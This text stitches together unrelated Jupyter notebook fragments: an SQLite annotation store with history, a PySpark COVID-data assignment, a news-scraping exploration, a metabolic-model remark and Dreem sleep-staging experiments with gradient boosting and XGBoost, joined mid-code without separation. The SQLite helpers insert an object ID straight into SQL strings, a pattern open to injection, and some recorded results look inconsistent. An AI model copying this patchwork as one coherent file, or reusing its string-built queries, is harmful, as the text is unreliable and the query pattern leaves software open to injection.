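    return [(ts, json.loads(blob)) for ts, blob in c.execute(query).fetchall()]

For example, _get_history(conn, 'lala2') would return both versions inserted above, since the unchanged re-insert was ignored.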
_list_table(conn, latest=False) _get(conn, _get_object_id_at_pos(conn, 2)) #export def _to_dict(conn, table_name='data'): query = """ SELECT objectID, data from {} GROUP BY objectID ORDER BY timestamp """.format(table_name) c = conn.cursor() return {key: json.loads(value) for key, value in c.execute(query).fetchall()} _to_dict(conn) _get(conn, object_id="lala3") #export def _row_count(conn, table_name='data'): query = """ SELECT COUNT(DISTINCT objectID) FROM {} """.format(table_name) c = conn.cursor() res = c.execute(query).fetchone() return res[0] _row_count(conn) #export def _delete_last(conn, object_id, table_name='data'): query = """ DELETE FROM {} WHERE objectId = '{}' ORDER BY timestamp LIMIT 1 """.format(table_name, object_id) c = conn.cursor() res = c.execute(query) conn.commit() #export def _delete_all(conn, object_id, table_name='data'): query = """ DELETE FROM {} WHERE objectId = '{}' """.format(table_name, object_id) c = conn.cursor() res = c.execute(query) conn.commit() _list_table(conn, latest=False) _delete_last(conn, 'lala3') _list_table(conn, latest=False) _delete_all(conn, 'lala2') _list_table(conn, latest=False) _row_count(conn)Persistent Storage with history support#export class AnnotationStorageIterator: def __init__(self, annotator_storage): self.annotator_storage = annotator_storage self.index = 0 def __next__(self): try: result = self.annotator_storage.at(self.index) self.index += 1 except IndexError: raise StopIteration return result def next(self): return self.__next__() def prev(self): self.index -= 1 if self.index < 0: raise StopIteration return self.annotator_storage.at(self.index) #export class AnnotationDBStorage(MutableMapping): def __init__(self, conn_string, im_paths=None): self.conn = sqlite3.connect(conn_string) _create_tables(self.conn) if im_paths: self.update({p.name: {} for p in im_paths}) def update(self, dict_): for k, v in dict_.items(): _insert(self.conn, k, v) def __getitem__(self, key): item = _get(self.conn, key) if item is None: raise IndexError return item def get(self, key, default): if _get(self.conn, key) is None: return default def __delitem__(self, key): _delete_last(self.conn, key) def delete_all(self, key): _delete_all(self.conn, key) def at(self, pos): # bug fix needed when combined with del operations object_id = _get_object_id_at_pos(self.conn, pos) if object_id is None or pos < 0: raise IndexError return _get(self.conn, object_id) def __setitem__(self, key, value): _insert(self.conn, key, value) def __iter__(self): return AnnotationStorageIterator(self) def __len__(self): return _row_count(self.conn) def __repr__(self): return f"{type(self).__name__}({_list_table(self.conn)[:2] + [' ...']})" def to_dict(self): return _to_dict(self.conn) im_paths = [Path('some/path', f) for f in ['name1', 'name2', 'name3']] storage = AnnotationDBStorage(":memory:", im_paths) storage storage['name5'] = {'x': 5, 'y': 3, 'width': 7, 'height': 1} test_eq(storage.at(3), {'x': 5, 'y': 3, 'width': 7, 'height': 1}) test_eq(len(storage), 4) test_eq(storage['name5'], {'x': 5, 'y': 3, 'width': 7, 'height': 1}) myiter = iter(storage) for i in range(len(storage)): print(i, storage.at(i)) test_eq(storage.at(i), next(myiter)) myiter.prev() myiter.prev() myiter.next() for i in storage: print(i) len_before = len(storage) storage.pop('name1') test_eq(len(storage), len_before - 1) storage.to_dict() for i in range(len(storage)): print(i, storage.at(i)) # TODO delete objectID from object table if not anymore in data storage test_eq(storage.get('name8', {'dict':'obj'}), 
{'dict':'obj'}) storage.to_dict() #hide from nbdev.export import notebook2script notebook2script()**Assignment 1, Task 2**import findspark findspark.init() from pyspark.sql import SparkSession from pyspark.sql.functions import col, to_timestamp, to_date, countDistinct, udf, date_format, max as s_max, min as s_min from pyspark.sql.types import FloatType from scipy.spatial import distance from matplotlib import pyplot as plt import seaborn as sns import pandas as pd spark = SparkSession.builder.getOrCreate() df = spark.read.options(header=True, inferSchema=True).csv('raw\covid.csv')Data Explorationdf.printSchema() # create a date column df = df.withColumn("date", to_date(col("Date_Time"), "yyyy-MM-dd")) # sneak-peak at data df.limit(5).toPandas() # size and cols print((df.count(), len(df.columns))) # a look into a user's data df.select(['Date_Time', 'date', 'id', 'infection_status']).where(col('id') == '32645').limit(15).toPandas()Q1: Plot the total number of infections, recoveries and deaths w.r.t date?# select subset of columns q1 = df.select(['id', 'date', 'infection_status']).dropDuplicates() # group by infection status q1_agg_pdf = q1.groupBy(['date', 'infection_status']).agg(countDistinct('id').alias('people')).toPandas() # susceptible is not needed q1_agg_pdf = q1_agg_pdf[q1_agg_pdf['infection_status'] != 'susceptible'] # fix type q1_agg_pdf['date'] = q1_agg_pdf['date'].apply(pd.to_datetime) # sort q1_agg_pdf.sort_values('date', inplace=True) # visualize plt.figure(figsize=(12,6)) ax = sns.lineplot(x="date", y="people", hue="infection_status", data=q1_agg_pdf) plt.xticks(rotation=45)d:\workplace\environments\bigdata\lib\site-packages\pandas\plotting\_converter.py:129: FutureWarning: Using an implicitly registered datetime converter for a matplotlib plotting method. The converter was registered by pandas on import. Future versions of pandas will require you to explicitly register matplotlib converters. To register the converters: >>> from pandas.plotting import register_matplotlib_converters >>> register_matplotlib_converters() warnings.warn(msg, FutureWarning)Q2: Plot a pie chart for the ratio of asymptomatic and symptomatic infections# filter for infections infections = df.select(['id', 'is_symptomatic', 'infection_status']).where(col('infection_status') == 'infected') # aggregate is_symptomatic = infections.groupBy('is_symptomatic').agg(countDistinct('id').alias('people')).toPandas() is_symptomatic # visualize plt.figure(figsize=(12,6)) ax = plt.pie(is_symptomatic['people'], labels=['Symptomatic', 'Asymptomatic'], explode=(0, 0.1), autopct='%1.1f%%', shadow=True, startangle=90)Q3: Plot the variation of proximity of individual (ID=37415) w.r.t date. Assumptions* only date is to be considered while calculating proximity* questions is sort of pointed at knowing the variation of total number of people that a person was around at any location at any time of dayuser_id = 37415 # filter for user data user_data = df.select(['id', 'date', 'currentLocationID', 'currentLocationType']).where(col('id') == user_id) # prepare table to join temp_df = df.select(['id', 'date', 'currentLocationID', 'currentLocationType']) # join with full data to pick all people who shared location with 37415 on a date at any time joined = user_data.alias('user').join(temp_df.alias('proximity'), on=['date', 'currentLocationID', 'currentLocationType'], how='inner') # take count, i.e. 
aggregate proximity_pdf = joined.groupBy(['user.date', 'user.currentLocationID', 'user.currentLocationType']).agg(countDistinct('proximity.id').alias('proximity')).toPandas() proximity_pdf.sort_values('date', inplace=True) proximity_pdf.head() proximity_pdf.shape # day-level calculation final_proximity = proximity_pdf.groupby('date')['proximity'].sum() # visulize plt.figure(figsize=(12,6)) ax = final_proximity.plot() plt.xticks(rotation=30) sns.despine() plt.title('Proximity for {} w.r.t date'.format(user_id))Q4: Plot bar graphs to show the mortality rates and infection rates per age groups (create age groups 0-10, 10-20, and so on).age = df.select(['id', 'age', 'infection_status'])_**Age**_# group by age and infection status age_pdf = age.groupBy(['age', 'infection_status']).agg(countDistinct('id').alias('people')).toPandas() # sort data just to make more sense age_pdf.sort_values(by='age', inplace=True) # pivot in order to compute mortality rate age_pdf = age_pdf.pivot(index='age', columns='infection_status', values='people') # fill blanks with 0, just to simplify age_pdf.fillna(0, inplace=True) age_pdf.reset_index(inplace=True) age_pdf.rename_axis("index", axis="columns", inplace=True) bins = [0, 10, 20, 30, 40, 50, 60, 70, 80, 90, 100] age_pdf['age_bin'] = pd.cut(age_pdf['age'], bins=bins) final = age_pdf.groupby('age_bin', as_index=False).agg({'susceptible':'sum', 'infected':'sum', 'deceased':'sum'}) # claculate deceased ratio or mortality rate final['infection_rate'] = (final['infected'] / final['susceptible']) * 100 # claculate deceased ratio or mortality rate final['mortality_rate'] = (final['deceased'] / final['susceptible']) * 100 final.head() # visualize to check variation plt.figure(figsize=(12,6)) ax = sns.barplot(x="age_bin", y="infection_rate", data=final) plt.xticks(rotation=45) sns.despine() plt.title('Infection Rate w.r.t Age group') # visualize to check variation plt.figure(figsize=(12,6)) ax = sns.barplot(x="age_bin", y="mortality_rate", data=final) plt.xticks(rotation=45) sns.despine() plt.title('Mortality Rate w.r.t Age group')Q5: Visualize the number of individuals at a location on a geographical map. 
(COMPLEX: Can be done with Tableau, Plotly) Idea is to aggegate data using spark and then use Power BI to visualizeAssumption: Better way will be to have date/time wise geographical distribution of people, so considering datetimegeographical_counts = df.select(['Date_Time', 'lon', 'lat', 'id']).groupBy(['Date_Time', 'lon', 'lat']).agg(countDistinct('id').alias('people')).toPandas() geographical_counts.to_csv('geographical_counts.csv', index=False) geographical_counts.shapeWebscraping EDA , 17 September 2020# import basic ds packages import pandas as pd import numpy as np import matplotlib.pyplot as plt import seaborn as sns # importing packages for webscraping # following https://towardsdatascience.com/web-scraping-news-articles-in-python-9dd605799558 import requests from bs4 import BeautifulSoup import urllib.request,sys,time # get list of urls for initial tests urls = [ "https://www.wsj.com/articles/global-stock-markets-dow-update-9-17-2020-11600334220?mod=hp_lead_pos1", "https://www.theguardian.com/sport/2020/sep/17/andy-murray-backs-calls-to-remove-margaret-courts-name-from-tennis-arena", "https://www.foxnews.com/world/british-man-live-snake-face-mask-public-bus-photo", "https://www.cnn.com/2020/09/17/weather/storm-sally-thursday/index.html", ] # loop through URLs # following here: https://towardsdatascience.com/easily-scrape-and-summarize-news-articles-using-python-dfc7667d9e74 for ind, url in enumerate(urls): # get html content of url page = requests.get(url) coverpage = page.content # create soup object soup = BeautifulSoup(coverpage, 'html.parser') # get title headline = soup.find('h1').get_text() print(headline) print(' ') # get text from all
<p>
tags p_tags = soup.find_all('p') # get text from each p tag and strip whitespace p_tags_text = [tag.get_text().strip() for tag in p_tags] print(p_tags) print(' ') print(p_tags_text) print(' ') # get news text # coverpage_news = soup1.find_all('h2', class_='articulo-titulo') if ind == 2: break # coverpage # r1 page.status_code p_tags_text_1string = '' for p_tag_text in p_tags_text: p_tags_text_1string += p_tag_text print(p_tags_text_1string) p_tags_textThe three missing metabolites are not in the xml model at all. The two tentative cell mass pseudo-metabolites are not in the biomass reaction.If the -1000,1000 exchanges are used instead of those provided by the authors, then the model can grow. This indicates that an essential metabolite is missing form the input, or that secretion of a certain metabolite must be enabled.cb.io.save_json_model(m, 'iSR432_w_exch.json')Frequency aboive 100Hz are always null, we don't need the columnseeg.drop(columns=["eeg1_Above100Hz0", "eeg2_Above100Hz0", "eeg3_Above100Hz0", "eeg4_Above100Hz0"], inplace=True) df = pd.concat([eeg, acc, pulse, naif], axis=1) #training, test = np.split(df.sample(frac=1, random_state=42), [int(.8*len(df))]) training, test = train_test_split(df, test_size=0.2, random_state=42) X = training.iloc[:,:-1] y = training.iloc[:,-1] X_test = test.iloc[:,:-1] y_true = test.iloc[:,-1]Subdatat set: - naif - all butnaif.columns[:-1] Xbaseline = X.drop(columns=naif.columns[:-1], inplace=False) X_testbaseline = X_test.drop(columns=naif.columns[:-1], inplace=False) Xbaseline.head() L= list(eeg.columns) + list(acc.columns) + list(pulse.columns)#eeg.columns + acc.columns + pulse.columns Xnaif = X.drop(columns=L, inplace=False) X_testnaif = X_test.drop(columns=L, inplace=False) Xnaif.head() L= list(naif.columns[:-1]) + list(acc.columns) + list(pulse.columns) Xeeg = X.drop(columns=L, inplace=False) X_testeeg = X_test.drop(columns=L, inplace=False) Xeeg.head() L= list(naif.columns[:-1]) + list(acc.columns) + list(eeg.columns) Xpulse= X.drop(columns=L, inplace=False) X_testpulse = X_test.drop(columns=L, inplace=False) Xpulse.head() L= list(naif.columns[:-1]) + list(pulse.columns) + list(eeg.columns) Xacc= X.drop(columns=L, inplace=False) X_testacc = X_test.drop(columns=L, inplace=False) Xacc.head() def plot_confusion_matrix(cm, classes, normalize=False, title='Confusion matrix', cmap=plt.cm.Blues): """ This function prints and plots the confusion matrix. Normalization can be applied by setting `normalize=True`. """ if normalize: cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis] print("Normalized confusion matrix") else: print('Confusion matrix, without normalization') print(cm) plt.imshow(cm, interpolation='nearest', cmap=cmap) plt.title(title) plt.colorbar() tick_marks = np.arange(len(classes)) plt.xticks(tick_marks, classes, rotation=45) plt.yticks(tick_marks, classes) fmt = '.2f' if normalize else 'd' thresh = cm.max() / 2. 
for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])): plt.text(j, i, format(cm[i, j], fmt), horizontalalignment="center", color="white" if cm[i, j] > thresh else "black") plt.tight_layout() plt.ylabel('True label') plt.xlabel('Predicted label') Xpulse.columnspulse only With only ir sensorkappa = 0.260accuracy = 0.473with both ir and r sensorfor n_estimators= 40- log loss = 1.131- kappa = 0.324- accuracy = 0.537gbc = GradientBoostingClassifier(n_estimators = 30, random_state=42) r1 = [1] r2 = [2] parametres = {'max_depth': [8, 10, 13] ,'learning_rate': [0.1], "min_samples_leaf" : r1, "min_samples_split" : r2, 'subsample': [0.7]} ck_score = make_scorer(cohen_kappa_score) grid = GridSearchCV(estimator=gbc, param_grid=parametres, scoring=ck_score, n_jobs=-1, verbose=2) grid_fitted = grid.fit(Xpulse,y) print(grid_fitted.best_params_) y_pred = grid.predict(X_testpulse) print("kappa: ", cohen_kappa_score(y_true, y_pred)) print("accurancy for n_estimators = " , accuracy_score(y_true, y_pred)) errors = [] Lk = [] La = [] r = range(10, 100 , 10) for i in r: gbc = GradientBoostingClassifier(n_estimators = i, random_state=42, learning_rate= 0.1, max_depth= 13, min_samples_leaf= 1, min_samples_split= 2, subsample= 0.7) gbc.fit(Xpulse, y) ll = log_loss(y_true, gbc.predict_proba(X_testpulse)) errors.append(ll) y_pred = gbc.predict(X_testpulse) k=cohen_kappa_score(y_true, y_pred) a= accuracy_score(y_true, y_pred) print("for n_estimators= ", i) print("log loss = ", ll) print("kappa = ", k) print("accuracy = ", a) Lk.append(k) La.append(a) plt.plot(r, errors, label = "log loss") plt.plot(r, La, label = "accuracy") plt.plot(r, Lk, label = "kappa") plt.legend(loc='lower right')go for n estimators = 40errors = [] Lk = [] La = [] i=40 gbc = GradientBoostingClassifier(n_estimators = i, random_state=42, learning_rate= 0.1, max_depth= 13, min_samples_leaf= 1, min_samples_split= 2, subsample= 0.8) gbc.fit(Xpulse, y) ll = log_loss(y_true, gbc.predict_proba(X_testpulse)) y_pred = gbc.predict(X_testpulse) k=cohen_kappa_score(y_true, y_pred) a= accuracy_score(y_true, y_pred) print("for n_estimators= ", i) print("log loss = ", ll) print("kappa = ", k) print("accuracy = ", a) cnf_matrix = confusion_matrix(y_true, y_pred) np.set_printoptions(precision=2) plt.figure() plot_confusion_matrix(cnf_matrix, classes=[0, 1, 2, 3, 4], title='Confusion matrix, without normalization') plt.figure() plot_confusion_matrix(cnf_matrix, classes=[0, 1, 2, 3, 4], normalize=True, title='Normalized confusion matrix') plt.show() importances = gbc.feature_importances_ feature_importances = pd.DataFrame(importances, index = Xpulse.columns, columns=['importance']).sort_values('importance', ascending=False) plt.bar(feature_importances.index, feature_importances["importance"]) plt.show() feature_importances.head(50)r and ir feature have comparable importancelow_r = Xpulse[Xpulse.BPMlessthan30_r!=0] low_r.shape low_r[low_r.BPMlessthan30_ir!=0].shape1113 rows with BPM less than 30 for both sensors(error measures ) filtering out for learning rows with less than 30 BPM for both sensorswhen filtering the training set out of rows with BPM less than 30 bpm, for n_estimators= 30, get following performance- kappa = 0.324- accuracy = 0.537to be compared with performance without filtering- kappa = 0.324- accuracy = 0.537No performance gain from filtering outXpulseF = Xpulse[Xpulse.BPMlessthan30_r==0][Xpulse.BPMlessthan30_ir==0] XpulseF.shape yF= y[XpulseF.index] yF.shape np.all(yF.index == XpulseF.index) gbc = 
GradientBoostingClassifier(n_estimators = 30, random_state=42) r1 = [1] r2 = [2] parametres = {'max_depth': [5, 10, 13] ,'learning_rate': [0.1], "min_samples_leaf" : r1, "min_samples_split" : r2, 'subsample': [0.7]} ck_score = make_scorer(cohen_kappa_score) grid = GridSearchCV(estimator=gbc, param_grid=parametres, scoring=ck_score, n_jobs=-1, verbose=2) grid_fitted = grid.fit(XpulseF,yF) print(grid_fitted.best_params_) y_pred = grid.predict(X_testpulse) print("kappa: ", cohen_kappa_score(y_true, y_pred)) print("accurancy for n_estimators = " , accuracy_score(y_true, y_pred)) for i in r: gbc = GradientBoostingClassifier(n_estimators = i, random_state=42, learning_rate= 0.1, max_depth= 13, min_samples_leaf= 1, min_samples_split= 2, subsample= 0.8) gbc.fit(XpulseF, yF) ll = log_loss(y_true, gbc.predict_proba(X_testpulse)) errors.append(ll) y_pred = gbc.predict(X_testpulse) k=cohen_kappa_score(y_true, y_pred) a= accuracy_score(y_true, y_pred) print("for n_estimators= ", i) print("log loss = ", ll) print("kappa = ", k) print("accuracy = ", a) Lk.append(k) La.append(a) plt.plot(r, errors, label = "log loss") plt.plot(r, La, label = "accuracy") plt.plot(r, Lk, label = "kappa") plt.legend(loc='lower right')go with 30errors = [] Lk = [] La = [] i=30 gbc = GradientBoostingClassifier(n_estimators = i, random_state=42, learning_rate= 0.1, max_depth= 15, min_samples_leaf= 1, min_samples_split= 2, subsample= 0.8) gbc.fit(XpulseF, yF) ll = log_loss(y_true, gbc.predict_proba(X_testpulse)) y_pred = gbc.predict(X_testpulse) k=cohen_kappa_score(y_true, y_pred) a= accuracy_score(y_true, y_pred) print("for n_estimators= ", i) print("log loss = ", ll) print("kappa = ", k) print("accuracy = ", a) cnf_matrix = confusion_matrix(y_true, y_pred) np.set_printoptions(precision=2) plt.figure() plot_confusion_matrix(cnf_matrix, classes=[0, 1, 2, 3, 4], title='Confusion matrix, without normalization') plt.figure() plot_confusion_matrix(cnf_matrix, classes=[0, 1, 2, 3, 4], normalize=True, title='Normalized confusion matrix') plt.show() importances = gbc.feature_importances_ feature_importances = pd.DataFrame(importances, index = Xpulse.columns, columns=['importance']).sort_values('importance', ascending=False) plt.bar(feature_importances.index, feature_importances["importance"]) plt.show() feature_importances.head(30)Pulse amplitude- non shuffle folds- work with XGboost instead of gbm. 
(gbm kappa = 0.324 with suffle and gbm)pulseAmp = pd.read_csv('C:\\Users\\i053131\\Desktop\\Epilepsie\\Dreem\\data\\interim\\pulse_ampTrain.csv') pulseAmp = pulseAmp.iloc[:, 1:] dataPath = "C:\\Users\\i053131\\Desktop\\Epilepsie\\Dreem\\data\\raw\\" trainOutput = pd.read_csv(dataPath + "challenge_fichier_de_sortie_dentrainement_classification_en_stade_de_sommeil_a_laide_de_signaux_mesures_par_le_bandeau_dreem.csv", sep=";") Y = trainOutput["label"]reestablishing reference for pulse with Xgboost and non suffle floodpulse = pd.read_csv('C:\\Users\\i053131\\Desktop\\Epilepsie\\Dreem\\data\\interim\\pulse_featuresTrain.csv') pulse = pulse.iloc[:, 1:] df = pulse df["Y"] = trainOutput["label"] train = df.iloc[0:int(df.shape[0]*0.8), :] test = df.iloc[int(df.shape[0]*0.8):, :] Xpulse = train.iloc[:,:-1] y = train.iloc[:,-1] X_testpulse = test.iloc[:,:-1] y_true = test.iloc[:,-1] #L= list(naif.columns[:-1]) + list(acc.columns) + list(eeg.columns) #Xpulse= X.drop(columns=L, inplace=False) #X_testpulse = X_test.drop(columns=L, inplace=False) Xpulse.columns pulseAmp.columns y_true.unique() %%time errors = [] Lk = [] La = [] r = range(10, 100, 10) for i in r: xbc = xgb.XGBClassifier(n_estimators = i, random_state=42, learning_rate= 0.1, max_depth= 8, subsample= 0.7, n_jobs=-2, reg_lambda=5) xbc.fit(Xpulse, y) ll = log_loss(y_true, xbc.predict_proba(X_testpulse)) errors.append(ll) y_pred = xbc.predict(X_testpulse) k=cohen_kappa_score(y_true, y_pred) a= accuracy_score(y_true, y_pred) print("considering ", i, " epochs") print("log loss = ", ll) print("kappa = ", k) print("accuracy = ", a) Lk.append(k) La.append(a) plt.plot(r, errors, label = "log loss") plt.legend(loc='upper right') plt.show() plt.plot(r, Lk, label = "kappa") plt.legend(loc='lower right') plt.show()Pulse AmplitudedataPath = "C:\\Users\\i053131\\Desktop\\Epilepsie\\Dreem\\data\\raw\\" trainOutput = pd.read_csv(dataPath + "challenge_fichier_de_sortie_dentrainement_classification_en_stade_de_sommeil_a_laide_de_signaux_mesures_par_le_bandeau_dreem.csv", sep=";") Y = trainOutput["label"] pulseAmp = pd.read_csv('C:\\Users\\i053131\\Desktop\\Epilepsie\\Dreem\\data\\interim\\pulse_ampTrain.csv') pulseAmp = pulseAmp.iloc[:, 1:] pulse.columns dfa = pulseAmp dfa["Y"] = trainOutput["label"] trainA = dfa.iloc[0:int(df.shape[0]*0.8), :] testA = dfa.iloc[int(df.shape[0]*0.8):, :] Xa = trainA.iloc[:,:-1] ya = trainA.iloc[:,-1] Xa_test = testA.iloc[:,:-1] ya_true = testA.iloc[:,-1] %%time errors = [] Lk = [] La = [] r = range(10, 110, 10) for i in r: xbc = xgb.XGBClassifier(n_estimators = i, random_state=42, learning_rate= 0.1, max_depth= 8, subsample= 0.7, n_jobs=-2, reg_lambda=5) xbc.fit(Xa, y) ll = log_loss(y_true, xbc.predict_proba(Xa_test)) errors.append(ll) y_pred = xbc.predict(Xa_test) k=cohen_kappa_score(y_true, y_pred) a= accuracy_score(y_true, y_pred) print("considering ", i, " epochs") print("log loss = ", ll) print("kappa = ", k) print("accuracy = ", a) Lk.append(k) La.append(a) plt.plot(r, errors, label = "log loss") plt.legend(loc='upper right') plt.show() plt.plot(r, Lk, label = "kappa") plt.legend(loc='lower right') plt.show() print(Xa.index) print(Xpulse.index) Xap= pd.concat([Xa, Xpulse], axis = 1) Xap_test = pd.concat([Xa_test, X_testpulse], axis = 1) %%time errors = [] Lk = [] La = [] r = range(10, 110, 10) for i in r: xbc = xgb.XGBClassifier(n_estimators = i, random_state=42, learning_rate= 0.1, max_depth= 8, subsample= 0.7, n_jobs=-2, reg_lambda=5) xbc.fit(Xap, y) ll = log_loss(y_true, xbc.predict_proba(Xap_test)) errors.append(ll) 
y_pred = xbc.predict(Xap_test) k=cohen_kappa_score(y_true, y_pred) a= accuracy_score(y_true, y_pred) print("considering ", i, " epochs") print("log loss = ", ll) print("kappa = ", k) print("accuracy = ", a) Lk.append(k) La.append(a) plt.plot(r, errors, label = "log loss") plt.legend(loc='upper right') plt.show() plt.plot(r, Lk, label = "kappa") plt.legend(loc='lower right') plt.show() importances = xbc.feature_importances_ feature_importances = pd.DataFrame(importances, index = Xap.columns, columns=['importance']).sort_values('importance', ascending=False) plt.bar(feature_importances.index, feature_importances["importance"]) plt.show() feature_importances.head(50)accelerometer- kappa = 0.20032681770992822- accuracy = 0.45550992470910334gbc = GradientBoostingClassifier(n_estimators = 100, random_state=42) r1 = [1] r2 = [2] parametres = {'max_depth': [5, 10, 15] ,'learning_rate': [0.1], "min_samples_leaf" : r1, "min_samples_split" : r2, 'subsample': [0.6, 0.8, 1.0]} ck_score = make_scorer(cohen_kappa_score) grid = GridSearchCV(estimator=gbc, param_grid=parametres, scoring=ck_score, n_jobs=-1, verbose=2) grid_fitted = grid.fit(Xacc,y) print(grid_fitted.best_params_) y_pred = grid.predict(X_testacc) print("kappa: ", cohen_kappa_score(y_true, y_pred)) print("accurancy for n_estimators = " , accuracy_score(y_true, y_pred)) errors = [] Lk = [] La = [] r = range(10, 200 , 10) for i in r: gbc = GradientBoostingClassifier(n_estimators = i, random_state=42, learning_rate= 0.1, max_depth= 5, min_samples_leaf= 1, min_samples_split= 2, subsample= 0.8) gbc.fit(Xacc, y) ll = log_loss(y_true, gbc.predict_proba(X_testacc)) errors.append(ll) y_pred = gbc.predict(X_testacc) k=cohen_kappa_score(y_true, y_pred) a= accuracy_score(y_true, y_pred) print("for n_estimators= ", i) print("log loss = ", ll) print("kappa = ", k) print("accuracy = ", a) Lk.append(k) La.append(a) plt.plot(r, errors, label = "log loss") plt.plot(r, La, label = "accuracy") plt.plot(r, Lk, label = "kappa") plt.legend(loc='lower right')go for - n_estimators= 60- log loss = 1.23084271494082- kappa = 0.20032681770992822- accuracy = 0.45550992470910334errors = [] Lk = [] La = [] i=60 gbc = GradientBoostingClassifier(n_estimators = i, random_state=42, learning_rate= 0.1, max_depth= 5, min_samples_leaf= 1, min_samples_split= 2, subsample= 0.8) gbc.fit(Xacc, y) ll = log_loss(y_true, gbc.predict_proba(X_testacc)) y_pred = gbc.predict(X_testacc) k=cohen_kappa_score(y_true, y_pred) a= accuracy_score(y_true, y_pred) print("for n_estimators= ", i) print("log loss = ", ll) print("kappa = ", k) print("accuracy = ", a) cnf_matrix = confusion_matrix(y_true, y_pred) np.set_printoptions(precision=2) plt.figure() plot_confusion_matrix(cnf_matrix, classes=[0, 1, 2, 3, 4], title='Confusion matrix, without normalization') plt.figure() plot_confusion_matrix(cnf_matrix, classes=[0, 1, 2, 3, 4], normalize=True, title='Normalized confusion matrix') plt.show() importances = gbc.feature_importances_ feature_importances = pd.DataFrame(importances, index = Xacc.columns, columns=['importance']).sort_values('importance', ascending=False) plt.bar(feature_importances.index, feature_importances["importance"]) plt.show() feature_importances.head(50)EEG - for n_estimators= 50- log loss = 0.643- kappa = 0.677- accuracy = 0.770gbc = GradientBoostingClassifier(n_estimators = 100, random_state=42) r1 = [1] r2 = [2] parametres = {'max_depth': [5, 10, 15] ,'learning_rate': [0.1], "min_samples_leaf" : r1, "min_samples_split" : r2, 'subsample': [0.6, 0.8, 1.0]} ck_score = 
make_scorer(cohen_kappa_score) grid = GridSearchCV(estimator=gbc, param_grid=parametres, scoring=ck_score, n_jobs=-1, verbose=2) grid_fitted = grid.fit(Xeeg,y) print(grid_fitted.best_params_) y_pred = grid.predict(X_testeeg) print("kappa: ", cohen_kappa_score(y_true, y_pred)) print("accurancy for n_estimators = " , accuracy_score(y_true, y_pred)) errors = [] Lk = [] La = [] r = range(10, 120 , 10) for i in r: gbc = GradientBoostingClassifier(n_estimators = i, random_state=42, learning_rate= 0.1, max_depth= 15, min_samples_leaf= 1, min_samples_split= 2, subsample= 0.6) gbc.fit(Xeeg, y) ll = log_loss(y_true, gbc.predict_proba(X_testeeg)) errors.append(ll) y_pred = gbc.predict(X_testeeg) k=cohen_kappa_score(y_true, y_pred) a= accuracy_score(y_true, y_pred) print("for n_estimators= ", i) print("log loss = ", ll) print("kappa = ", k) print("accuracy = ", a) Lk.append(k) La.append(a) plt.plot(r, errors, label = "log loss") plt.plot(r, La, label = "accuracy") plt.plot(r, Lk, label = "kappa") plt.legend(loc='lower right')go for n estimators = 50errors = [] Lk = [] La = [] i=50 gbc = GradientBoostingClassifier(n_estimators = i, random_state=42, learning_rate= 0.1, max_depth= 15, min_samples_leaf= 1, min_samples_split= 2, subsample= 0.6) gbc.fit(Xeeg, y) ll = log_loss(y_true, gbc.predict_proba(X_testeeg)) y_pred = gbc.predict(X_testeeg) k=cohen_kappa_score(y_true, y_pred) a= accuracy_score(y_true, y_pred) print("for n_estimators= ", i) print("log loss = ", ll) print("kappa = ", k) print("accuracy = ", a) cnf_matrix = confusion_matrix(y_true, y_pred) np.set_printoptions(precision=2) plt.figure() plot_confusion_matrix(cnf_matrix, classes=[0, 1, 2, 3, 4], title='Confusion matrix, without normalization') plt.figure() plot_confusion_matrix(cnf_matrix, classes=[0, 1, 2, 3, 4], normalize=True, title='Normalized confusion matrix') plt.show() importances = gbc.feature_importances_ feature_importances = pd.DataFrame(importances, index = Xeeg.columns, columns=['importance']).sort_values('importance', ascending=False) plt.bar(feature_importances.index, feature_importances["importance"]) plt.show() feature_importances.head(50)EEG 2fourrier transformation on 2 seconds instead of 30 secWe run gradien boosting with same parameters than EEG 30.We get- for n_estimators= 50- log loss = 0.643- kappa = 0.663- accuracy = 0.763to be compared with EEG 30 - for n_estimators= 50- log loss = 0.643- kappa = 0.677- accuracy = 0.770so it is slightly less good !eeg = pd.read_excel('C:\\Users\\i053131\\Desktop\\Epilepsie\\Dreem\\data\\interim\\spectrogram_eeg_features2Train.xlsx') for i in range(15): eeg.drop(columns=["eeg1_Above100Hz"+str(i), "eeg2_Above100Hz"+str(i), "eeg3_Above100Hz"+str(i), "eeg4_Above100Hz"+str(i)], inplace=True) naif = pd.read_excel('C:\\Users\\i053131\\Desktop\\Epilepsie\\Dreem\\data\\interim\\featuresTrain.xlsx') acc = pd.read_excel('C:\\Users\\i053131\\Desktop\\Epilepsie\\Dreem\\data\\interim\\acc_featuresTrain.xlsx') pulse = pd.read_csv('C:\\Users\\i053131\\Desktop\\Epilepsie\\Dreem\\data\\interim\\pulse_featuresTrain.csv') df = pd.concat([eeg, acc, pulse, naif], axis=1) training, test = train_test_split(df, test_size=0.2, random_state=42) X = training.iloc[:,:-1] y = training.iloc[:,-1] X_test = test.iloc[:,:-1] y_true = test.iloc[:,-1] L= list(naif.columns[:-1]) + list(acc.columns) + list(pulse.columns) Xeeg = X.drop(columns=L, inplace=False) X_testeeg = X_test.drop(columns=L, inplace=False) X_testeeg.head() i=50 gbc = GradientBoostingClassifier(n_estimators = i, random_state=42, learning_rate= 0.1, 
max_depth= 15, min_samples_leaf= 1, min_samples_split= 2, subsample= 0.6) gbc.fit(Xeeg, y) ll = log_loss(y_true, gbc.predict_proba(X_testeeg)) y_pred = gbc.predict(X_testeeg) k=cohen_kappa_score(y_true, y_pred) a= accuracy_score(y_true, y_pred) print("for n_estimators= ", i) print("log loss = ", ll) print("kappa = ", k) print("accuracy = ", a)for n_estimators= 50 log loss = 0.6425063126769058 kappa = 0.6627738572503876 accuracy = 0.7627195984485512EEG with xgboost and non shuffle folddataPath = "C:\\Users\\i053131\\Desktop\\Epilepsie\\Dreem\\data\\raw\\" eeg = pd.read_excel('C:\\Users\\i053131\\Desktop\\Epilepsie\\Dreem\\data\\interim\\spectrogram_eeg_features30Train.xlsx') trainOutput = pd.read_csv(dataPath + "challenge_fichier_de_sortie_dentrainement_classification_en_stade_de_sommeil_a_laide_de_signaux_mesures_par_le_bandeau_dreem.csv", sep=";") eeg.drop(columns=["eeg1_Above100Hz0", "eeg2_Above100Hz0", "eeg3_Above100Hz0", "eeg4_Above100Hz0"], inplace=True) df = eeg df["Y"] = trainOutput["label"] train = df.iloc[0:int(df.shape[0]*0.8), :] test = df.iloc[int(df.shape[0]*0.8):, :] Xeeg = train.iloc[:,:-1] y = train.iloc[:,-1] 